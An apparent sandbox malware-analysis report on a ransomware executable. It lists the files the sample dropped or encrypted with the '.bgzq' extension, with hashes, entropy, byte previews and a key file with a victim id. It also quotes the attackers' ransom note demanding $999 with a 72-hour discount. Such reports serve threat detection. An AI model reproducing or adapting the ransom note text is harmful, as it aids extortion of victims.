                                                                                                SHA-512:41FCC722BAF329810C882D7CD578AC14D24611A96C2C33931F05E1112633304B4E14D79E201C8F2143018E2892006B22B20C0720186E176E6DC36E54106F3354
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:{"os_.iq..Pc.z.....q...h.b.D..W-/.x.s...[..k;....`..#HE.).,v(.S......o.........#...RF.5fK........-..!.".J.)..<B.f.~.D<...+.C............s.XF..x?..7..c...Q.kcS|.....y.\.7z.r.C....-.......8-9G./.cP.]%..2.~tM.g......."..X.r........t.e....]......!......8y..[f.4..eYX..;M.F..%.|b.`.H.;.|...!..ys.p27P(9.......aR#.;L.2....^..........}d.D^...|.....`x.......wa... ...<1K.........E]-CN...I.V+r.K.e..o..^..''...1..z.m....<.3...-R..?...!.....ny)..d.}..<.....~..e.;=l..h..&..f..J|l..Lr O...r.M.."!+..V.c.$.D-.}558V... ....X..%.Y..5...E..k`.v.V......./..jf..@......m.t.?..8..`Y..Q-..y.cw.C.}.7Q.y(.?d..z...P.......x..q.Q.q>...&...I.!..)on...<.Mo......o....tM..o..5.....:..6}h`0..9P..-]..c.Ud&.d.S.y].}....c..jF.......D8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3947
                                                                                                Entropy (8bit):7.952736752169177
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:Nz67YLwDTk0+TL1VE7NXvrKSATf+gyAaVVZ2NmdIF1:E74wDsTJahDKSA6gzah2Nmmb
                                                                                                MD5:021F4F188EF244CCA7EF0053F4BAB018
                                                                                                SHA1:1A4D3A1F8698F3B9D46EC24D22D602E707C6B3A2
                                                                                                SHA-256:44DA7C7A86CF500FB60965C2B5EDA47753DE045F71091CD004151696C98D6470
                                                                                                SHA-512:84FB6CC255C64D442337D12AEC6B138F5BAEABD43E6C5F780AC574F82EE1FEA7CEB4B58954FBCAB53FCDD257FE0DA8F49BF42ED2C231C58CDE6BE7C7902D1885
                                                                                                Malicious:false
                                                                                                Preview:*...#4.>.pC.^/{......._..<.G..EF.._:)#.E3...3&A...._M.....j=...M..O.L.h[.n..b.v:)d.]E_..A...1 .$.h{.T....@O..2.go..i....j.3u..B..c.7.R....S..H.&...........%.f..]R..r.YT.R{...9..R.."..%..(.5Z.%..u>..:.....|....;...e...l....."..>.....Z.s..p%....A...].....Zp$5{..s.@ .l..q.i....*.]....~e.|x!..7-{yR.9q.^.dg..-. T\EG;...e9.^..x@r...7.........!...!.U}...n.K.4.7.9SC...V..........`....J%.w........ .>o.....Uf.............w..|...D2..&(.=.W}..&...(.....K..W9@*T...........0........g...[sm.P......d-.9)Ok.[LD....){.X}a.......o...R..x...>.pe.ia......O.H..m.X|.'.z.(...u.....F..(........ t.=..w3.?..N.?.X.....+d....?.....t..y@h.... k#y.D^E&...X..^'5.N^..'...`./.@.....U.@.`V..,/^.......u!no.et.+..A..r...mZ.[.F|.o*.^.@.O.....b*.......5.w.}........=db]z.@..%......{D.oe...e.2w.`..'a.....W.....Y.,.....n.h.r.....0...#&...}.....=h.v7.OB....p......(.I!......j..x<.$0.8%)y.l*1...O..\0..+9F..kZQ.K..V..8,..`.vG.n.h....l.X...Dn.K.X.%V..1J...t..N....Fj..5..7Yd...b

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3947
                                                                                                Entropy (8bit):7.952736752169177
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:Nz67YLwDTk0+TL1VE7NXvrKSATf+gyAaVVZ2NmdIF1:E74wDsTJahDKSA6gzah2Nmmb
                                                                                                MD5:021F4F188EF244CCA7EF0053F4BAB018
                                                                                                SHA1:1A4D3A1F8698F3B9D46EC24D22D602E707C6B3A2
                                                                                                SHA-256:44DA7C7A86CF500FB60965C2B5EDA47753DE045F71091CD004151696C98D6470
                                                                                                SHA-512:84FB6CC255C64D442337D12AEC6B138F5BAEABD43E6C5F780AC574F82EE1FEA7CEB4B58954FBCAB53FCDD257FE0DA8F49BF42ED2C231C58CDE6BE7C7902D1885
                                                                                                Malicious:false
                                                                                                Preview:*...#4.>.pC.^/{......._..<.G..EF.._:)#.E3...3&A...._M.....j=...M..O.L.h[.n..b.v:)d.]E_..A...1 .$.h{.T....@O..2.go..i....j.3u..B..c.7.R....S..H.&...........%.f..]R..r.YT.R{...9..R.."..%..(.5Z.%..u>..:.....|....;...e...l....."..>.....Z.s..p%....A...].....Zp$5{..s.@ .l..q.i....*.]....~e.|x!..7-{yR.9q.^.dg..-. T\EG;...e9.^..x@r...7.........!...!.U}...n.K.4.7.9SC...V..........`....J%.w........ .>o.....Uf.............w..|...D2..&(.=.W}..&...(.....K..W9@*T...........0........g...[sm.P......d-.9)Ok.[LD....){.X}a.......o...R..x...>.pe.ia......O.H..m.X|.'.z.(...u.....F..(........ t.=..w3.?..N.?.X.....+d....?.....t..y@h.... k#y.D^E&...X..^'5.N^..'...`./.@.....U.@.`V..,/^.......u!no.et.+..A..r...mZ.[.F|.o*.^.@.O.....b*.......5.w.}........=db]z.@..%......{D.oe...e.2w.`..'a.....W.....Y.,.....n.h.r.....0...#&...}.....=h.v7.OB....p......(.I!......j..x<.$0.8%)y.l*1...O..\0..+9F..kZQ.K..V..8,..`.vG.n.h....l.X...Dn.K.X.%V..1J...t..N....Fj..5..7Yd...b

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):657
                                                                                                Entropy (8bit):7.684216250456284
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kLCz3s8we4sIQyyPzv31XjQxLeduZEalbZNrEn5hzGckQdRoSkBXfCSXEytzIciD:GYdP4pQymj3lQadwEG/rEtktKSXfzIbD
                                                                                                MD5:DE43E8947FF8984A95625B0CDEA83458
                                                                                                SHA1:FD646CDE97610FCD072D54913495C7C5922451A7
                                                                                                SHA-256:AA7548009666861C9A32C21F3CC73464F48258F4C709DA296BE7361F532BF9AA
                                                                                                SHA-512:7C299038BCCD7D6ECD891C0AB6BB5012D1D681E1303A79CB5E971DFA0076AEDB34C27E08BFEDD7C7D1FF7CA1749142DA26CEA6612EEF2E5A8FE17ED6640FFDA7
                                                                                                Malicious:false
                                                                                                Preview:2023/Z..a.F.1.s....g..{.!R.I.Z..A.p....I.'.&.<..]r..5.#....}.-...8..R....L......+#.A......H>.(@@.. ...a.<.Xr..q...a.[....H..J...#y..e|.....m...y.ws.zc..J.q.......~..\.6?O....y2./........G|..}......q<w..V.hbE8...y.3.Ef.....v.?..Yjg..<....=.k..u.K...t.....{..*..[8._t..../xa.)...(..[b..P......d!.........m...4I..ze....u.O..F.HO.......,m}.~....|I.|..U).Od@r.'..H..xQ..u.S...qE..Z.n..F.<...BYy..3..."Z...6.N.O.3.K..a>..J..c...DCwz....\......9K!....6;...PQw....UD..5q[...6......Q...dn.s.F.."9_...m.c.,2...k[.#jh....7....X."%tI..IX@..+.U..BEF..9...5g..8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):657
                                                                                                Entropy (8bit):7.684216250456284
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kLCz3s8we4sIQyyPzv31XjQxLeduZEalbZNrEn5hzGckQdRoSkBXfCSXEytzIciD:GYdP4pQymj3lQadwEG/rEtktKSXfzIbD
                                                                                                MD5:DE43E8947FF8984A95625B0CDEA83458
                                                                                                SHA1:FD646CDE97610FCD072D54913495C7C5922451A7
                                                                                                SHA-256:AA7548009666861C9A32C21F3CC73464F48258F4C709DA296BE7361F532BF9AA
                                                                                                SHA-512:7C299038BCCD7D6ECD891C0AB6BB5012D1D681E1303A79CB5E971DFA0076AEDB34C27E08BFEDD7C7D1FF7CA1749142DA26CEA6612EEF2E5A8FE17ED6640FFDA7
                                                                                                Malicious:false
                                                                                                Preview:2023/Z..a.F.1.s....g..{.!R.I.Z..A.p....I.'.&.<..]r..5.#....}.-...8..R....L......+#.A......H>.(@@.. ...a.<.Xr..q...a.[....H..J...#y..e|.....m...y.ws.zc..J.q.......~..\.6?O....y2./........G|..}......q<w..V.hbE8...y.3.Ef.....v.?..Yjg..<....=.k..u.K...t.....{..*..[8._t..../xa.)...(..[b..P......d!.........m...4I..ze....u.O..F.HO.......,m}.~....|I.|..U).Od@r.'..H..xQ..u.S...qE..Z.n..F.<...BYy..3..."Z...6.N.O.3.K..a>..J..c...DCwz....\......9K!....6;...PQw....UD..5q[...6......Q...dn.s.F.."9_...m.c.,2...k[.#jh....7....X."%tI..IX@..+.U..BEF..9...5g..8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):388
                                                                                                Entropy (8bit):7.367552833666105
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8+27a/+XQvHT5zPPZDIk+qRDSF13PfXEytzIcii9a:VmuHT5DPGdqhSfXfzIbD
                                                                                                MD5:7772516655E89FF7092E42D6E2AC2971
                                                                                                SHA1:E8E4E94899C21551909955E210DC1F3BE0AE23D5
                                                                                                SHA-256:127E246DCEE7E5B9574A80E58F0E0EC4750370DC2EEE4A76AE70AC70B556856D
                                                                                                SHA-512:668F26756CAC12B90A36850AA9FF4AABADD7A0DBB86D1EB4759EFDCE5E707D496FA5E6CC6FADEAF30C3BAD9DFAF3282B5EDDCC13ED8C5EDDA79BDAE349BC6F96
                                                                                                Malicious:false
                                                                                                Preview:08../...c.C...TcP........B..<....,qa..p.. .$...U1#....T.._.y...._U...#..RV....M...4...9.s7'VMU..~..X%...1..cf..fU...]..>p..-..._.*.D.@up....?....i..u1..=Xo.D...hWDFG.H.l...^~....N..Szd.;.gD....M.24....c.....$.0...h.........x..r.....<`.S.l....r...S*.._R....K]..9..ld..eI...P.j./.u..f...W..wz8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):388
                                                                                                Entropy (8bit):7.367552833666105
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8+27a/+XQvHT5zPPZDIk+qRDSF13PfXEytzIcii9a:VmuHT5DPGdqhSfXfzIbD
                                                                                                MD5:7772516655E89FF7092E42D6E2AC2971
                                                                                                SHA1:E8E4E94899C21551909955E210DC1F3BE0AE23D5
                                                                                                SHA-256:127E246DCEE7E5B9574A80E58F0E0EC4750370DC2EEE4A76AE70AC70B556856D
                                                                                                SHA-512:668F26756CAC12B90A36850AA9FF4AABADD7A0DBB86D1EB4759EFDCE5E707D496FA5E6CC6FADEAF30C3BAD9DFAF3282B5EDDCC13ED8C5EDDA79BDAE349BC6F96
                                                                                                Malicious:false
                                                                                                Preview:08../...c.C...TcP........B..<....,qa..p.. .$...U1#....T.._.y...._U...#..RV....M...4...9.s7'VMU..~..X%...1..cf..fU...]..>p..-..._.*.D.@up....?....i..u1..=Xo.D...hWDFG.H.l...^~....N..Szd.;.gD....M.24....c.....$.0...h.........x..r.....<`.S.l....r...S*.._R....K]..9..ld..eI...P.j./.u..f...W..wz8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):460
                                                                                                Entropy (8bit):7.492388878932036
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:GrBWpp486SCezxBp6oR7eqPKDXEytzIcii9a:GNOBIUQXfzIbD
                                                                                                MD5:286D63FA0907611861264FFB8D104813
                                                                                                SHA1:0E382948A3B3A9D67199767543832D18B157C229
                                                                                                SHA-256:A2710FA65846238705D429D6106F4B277972E5C145AC39CA4CF06698631D308E
                                                                                                SHA-512:0BD3066A577F508B7A32FBBE773AD8D3E2EBAD468810E22C6BFA73C9E7EF404BCC61D1F7635528F9FD9684B49F74FAA5651C4A1237C9BFEDBB4D12A72A2CE5A5
                                                                                                Malicious:false
                                                                                                Preview:.h.6..X....0.-.(%.f[..M^.......B....<...4....]..D\U.p=.Vx..y0........-...e..M.y.5L|.....h.p.x.z.!>...u.....b...J..T..r..9..n.:.K.jUb....4R}N.........v.{e..s.......hc..........j...W..(.J..|...y.Y.....\D...=.nR.W}..p..'...\.Z".......rM'.../A2.|.....9A..D......3l...@\..~.u....}q. ...1jD...i....".$..X...3.dff|...Q.1%-/....|...:'u=..#.;Pa.I./.1H`..r..X..>.n...8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):460
                                                                                                Entropy (8bit):7.492388878932036
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:GrBWpp486SCezxBp6oR7eqPKDXEytzIcii9a:GNOBIUQXfzIbD
                                                                                                MD5:286D63FA0907611861264FFB8D104813
                                                                                                SHA1:0E382948A3B3A9D67199767543832D18B157C229
                                                                                                SHA-256:A2710FA65846238705D429D6106F4B277972E5C145AC39CA4CF06698631D308E
                                                                                                SHA-512:0BD3066A577F508B7A32FBBE773AD8D3E2EBAD468810E22C6BFA73C9E7EF404BCC61D1F7635528F9FD9684B49F74FAA5651C4A1237C9BFEDBB4D12A72A2CE5A5
                                                                                                Malicious:false
                                                                                                Preview:.h.6..X....0.-.(%.f[..M^.......B....<...4....]..D\U.p=.Vx..y0........-...e..M.y.5L|.....h.p.x.z.!>...u.....b...J..T..r..9..n.:.K.jUb....4R}N.........v.{e..s.......hc..........j...W..(.J..|...y.Y.....\D...=.nR.W}..p..'...\.Z".......rM'.../A2.|.....9A..D......3l...@\..~.u....}q. ...1jD...i....".$..X...3.dff|...Q.1%-/....|...:'u=..#.;Pa.I./.1H`..r..X..>.n...8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\get[1].htm

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):560
                                                                                                Entropy (8bit):6.016191131234533
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YGJ68OvcVMeYJD1+NkZnYOq7OzP4VLmvO7g75TXEytF:YgJOkVMG6mP7OzbtXfF
                                                                                                MD5:94474048DF3AD67A6D21142410CA6347
                                                                                                SHA1:47A9F2FD44E54A05A306511BCFE05950A8DD24EF
                                                                                                SHA-256:B5ADCEE4F57B9EEE3EC95AF8A723D5AA02569E738652B9615C64EE742491172E
                                                                                                SHA-512:521DB2ECB4357D39C4D18D84EC0874CDB3F1DD3A8380D5C78A5BB76B454D9F3084ECC065F9D3C4C98DEC10C91FE874FBCA20BDA6BD6E42C4CB51576A05519327
                                                                                                Malicious:false
                                                                                                Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA443iuR4tYZbKarxLg2U\/\\nydof4gr3PygF4BEuW0IipeRs8Y2Naj7JI9WZ+TVmOpmadPbcR+3b\/+L9aehm+kxm\\nvMXW6Rmhovbl2M2JHqkaQ3wyHwtfR+ZnGKexM\/vU+3f5JgdvdaYEijo\/4pANkKB8\\nR2SB3c72tZ20mm39CVLMyan8neT3+3grdqX9zggAbYBHCH53jQM9B63b+D77rswH\\nSc\/LEmqRXomjw7KXYR0JRF5DflXmm1JBaKxv1dGRTo8wtI0y5TtzbJfzPink7L39\\nEuKBpARLg3gZeW96dT5sA7C8ivMxrH1VBWA6MgiECMs1mBHXp\/lNdJhKu8XX3XFw\\nBQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE"}

                                                                                                C:\Users\user\AppData\Local\VirtualStore\_README.txt

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1381
                                                                                                Entropy (8bit):4.894754314393066
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw31:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/kS
                                                                                                MD5:F15A25EF13B3CE75045B3DF6EA5E17D6
                                                                                                SHA1:0D0B0F5B56C116B60493629C439F6F6E3C71A034
                                                                                                SHA-256:E0354E011380D81532488C5F04748521FAB0A4E4F10979DE977694BE6864B35F
                                                                                                SHA-512:06BFEACEF2F073F9EDE529DDAF12F9C095BE9B4A4F053163493EFF7C1AE357C65732AA0ADD34AC6FA6E32E22D16FE0F317323B82D4A8E08199BEB741C0E60DE4
                                                                                                Malicious:true
                                                                                                Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                C:\Users\user\AppData\Local\bowsakkdestx.txt

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):560
                                                                                                Entropy (8bit):6.016191131234533
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:YGJ68OvcVMeYJD1+NkZnYOq7OzP4VLmvO7g75TXEytF:YgJOkVMG6mP7OzbtXfF
                                                                                                MD5:94474048DF3AD67A6D21142410CA6347
                                                                                                SHA1:47A9F2FD44E54A05A306511BCFE05950A8DD24EF
                                                                                                SHA-256:B5ADCEE4F57B9EEE3EC95AF8A723D5AA02569E738652B9615C64EE742491172E
                                                                                                SHA-512:521DB2ECB4357D39C4D18D84EC0874CDB3F1DD3A8380D5C78A5BB76B454D9F3084ECC065F9D3C4C98DEC10C91FE874FBCA20BDA6BD6E42C4CB51576A05519327
                                                                                                Malicious:false
                                                                                                Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA443iuR4tYZbKarxLg2U\/\\nydof4gr3PygF4BEuW0IipeRs8Y2Naj7JI9WZ+TVmOpmadPbcR+3b\/+L9aehm+kxm\\nvMXW6Rmhovbl2M2JHqkaQ3wyHwtfR+ZnGKexM\/vU+3f5JgdvdaYEijo\/4pANkKB8\\nR2SB3c72tZ20mm39CVLMyan8neT3+3grdqX9zggAbYBHCH53jQM9B63b+D77rswH\\nSc\/LEmqRXomjw7KXYR0JRF5DflXmm1JBaKxv1dGRTo8wtI0y5TtzbJfzPink7L39\\nEuKBpARLg3gZeW96dT5sA7C8ivMxrH1VBWA6MgiECMs1mBHXp\/lNdJhKu8XX3XFw\\nBQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE"}

                                                                                                C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):781824
                                                                                                Entropy (8bit):7.699125946845374
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:M2dc5bz6tqdDlvGkNwikL95whi6SY7Mf6cMFqNjOjNiaUORnV77J1BDg:uWqdBpNwJLsi6v7iMpxDV77J3s
                                                                                                MD5:E9FF14A975F084F01373D468C0B91A16
                                                                                                SHA1:302D4B9F88AE7B085B56661774D6805156039924
                                                                                                SHA-256:F6A6765642F0F8C4B81F45D4E1A9F65505432BBF4C249FA3C96B82D9C712EFFE
                                                                                                SHA-512:4C7965F1F1A123B57AB9CA49CD4B3DB35C9D98086EEC4CDD297B9B706D68DAC25183D052934F564F935459C49471C953453202A99B8F0D62E03B0626D8C41CE0
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 45%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bD}.&%..&%..&%..+w..8%..+w..Y%..+w...%../]..!%..&%..K%.....'%..+w..'%.....'%..Rich&%..................PE..L....:.d............................?C....... ....@.............................................................................P....................................!..8........................... ...@............ ...............................text...U........................... ..`.rdata....... ......................@..@.data...(]..........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\mU2p71KMss.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\Users\user\Desktop\BNAGMGSPLO.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.857408807667079
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4DL0wvzGWj5ywgPOUQGL7HGjIlsalq3RIT2rQXvGWh8Tqf1capKFcA8tFA6cXfz6:4fvVzc3HGjIlg3Rm2kJ8ek6mfzSD
                                                                                                MD5:FC12435A19509C45390A3519BE12A95A
                                                                                                SHA1:D6D7E63A8ADBA1798E6ECF7FF00992C19E94468D
                                                                                                SHA-256:1DCF5EA15D43C323FFDF496C01E46F957FEE1A5ED1B98537EEB0D1CF3002B0CB
                                                                                                SHA-512:1B8EB6FF1F878824AC48F35C85306B0061616F6DE154B3CEFA4C3542190D2A4C227556BCAD906E94CA8C91967A7BDF9DE2DDE594582519769B93CBD8249FA06B
                                                                                                Malicious:false
                                                                                                Preview:BNAGM(..j.P..F.#...'.8.N..u..p.].lI....T.bN.@..TV..N...M%....K.(.4.fn.$_W/TN...S...[..2.{.'.*.c..A..I....d...5.Y.......a...3....@.'7}..=\=.7.......LS....gE.........A..../.2....Wp!g..........N.:.....!....W:.Ca}....(...:"..15.p]..P..~.a.+.Z.%....<...}.......u{:,...._..w-rq.;-.......jl...ves..D...m>...i.-..I6sF.......`...O\.........b.z....*.M.*~..h.B?..U......l.Y|..x..#..l....E........}eH.S%....V.%..|DIr.8.&..r.!...t1.......Z*...-....&Q..V.-.=.%4N3..........Sr....~#. .t...Y>..B#..i.V. *..T.65.V.0?=_L.1..z.t......$....t......R..C->..-.B.FZVs..E.."b.W.j.U538%....S..Hb.....0H...<......u?....h.$A..-...q..V.%.7......I9...C.]....0!cS..d....!=.....4.K......K...c'Uz0..l-..{....."A .Kk.)R..v.)..X.....;.....{......+.f..O.&..j....!k..k,..M..K..vk\.&..F[h...y....C..D."V..s..XQ1.iH...z.7...U..s..*_.`..<.. T....oc.Cn.$X.m?.(.f.;wS(.G9..4?...n'..b....*.....:@c]kqp.a.....8eQ.o.Wu..............t....b..g.'.^..L?...<f..,..7..c.V1..L.9N...8.9d#6Y...;zn..-.

                                                                                                C:\Users\user\Desktop\BNAGMGSPLO.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.857408807667079
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4DL0wvzGWj5ywgPOUQGL7HGjIlsalq3RIT2rQXvGWh8Tqf1capKFcA8tFA6cXfz6:4fvVzc3HGjIlg3Rm2kJ8ek6mfzSD
                                                                                                MD5:FC12435A19509C45390A3519BE12A95A
                                                                                                SHA1:D6D7E63A8ADBA1798E6ECF7FF00992C19E94468D
                                                                                                SHA-256:1DCF5EA15D43C323FFDF496C01E46F957FEE1A5ED1B98537EEB0D1CF3002B0CB
                                                                                                SHA-512:1B8EB6FF1F878824AC48F35C85306B0061616F6DE154B3CEFA4C3542190D2A4C227556BCAD906E94CA8C91967A7BDF9DE2DDE594582519769B93CBD8249FA06B
                                                                                                Malicious:false
                                                                                                Preview:BNAGM(..j.P..F.#...'.8.N..u..p.].lI....T.bN.@..TV..N...M%....K.(.4.fn.$_W/TN...S...[..2.{.'.*.c..A..I....d...5.Y.......a...3....@.'7}..=\=.7.......LS....gE.........A..../.2....Wp!g..........N.:.....!....W:.Ca}....(...:"..15.p]..P..~.a.+.Z.%....<...}.......u{:,...._..w-rq.;-.......jl...ves..D...m>...i.-..I6sF.......`...O\.........b.z....*.M.*~..h.B?..U......l.Y|..x..#..l....E........}eH.S%....V.%..|DIr.8.&..r.!...t1.......Z*...-....&Q..V.-.=.%4N3..........Sr....~#. .t...Y>..B#..i.V. *..T.65.V.0?=_L.1..z.t......$....t......R..C->..-.B.FZVs..E.."b.W.j.U538%....S..Hb.....0H...<......u?....h.$A..-...q..V.%.7......I9...C.]....0!cS..d....!=.....4.K......K...c'Uz0..l-..{....."A .Kk.)R..v.)..X.....;.....{......+.f..O.&..j....!k..k,..M..K..vk\.&..F[h...y....C..D."V..s..XQ1.iH...z.7...U..s..*_.`..<.. T....oc.Cn.$X.m?.(.f.;wS(.G9..4?...n'..b....*.....:@c]kqp.a.....8eQ.o.Wu..............t....b..g.'.^..L?...<f..,..7..c.V1..L.9N...8.9d#6Y...;zn..-.

                                                                                                C:\Users\user\Desktop\BNAGMGSPLO\BNAGMGSPLO.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
